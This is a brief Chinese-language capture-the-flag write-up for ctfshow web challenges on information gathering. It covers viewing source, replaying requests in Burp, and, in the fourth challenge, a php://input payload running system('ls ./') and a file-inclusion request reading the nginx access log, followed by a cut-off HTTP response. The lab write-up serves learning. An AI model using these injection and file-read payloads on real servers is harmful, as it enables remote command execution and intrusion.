ctfshow第一类:信息收集web-1打开以后直接查看源码就可以了
web-2123有几种办法1.ctrl u查看源码,注释里的就是2.在url前面添加view-source:
web-3bp抓包重发就行了
web-4-1第四个和B站上给的不一样,是一个文件泄露的
wp说上来可以用php伪协议进行
123?url=php://input放到url后面<?php system('ls ./');?>放到最后
返回error
然后bp抓包发现是nginx的,使用
1?url=/var/log/nginx/access.log
查看日志文件
123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 12 May 2023 06:20:02 GMTContent-Type: text/html; charset=UTF-8C ...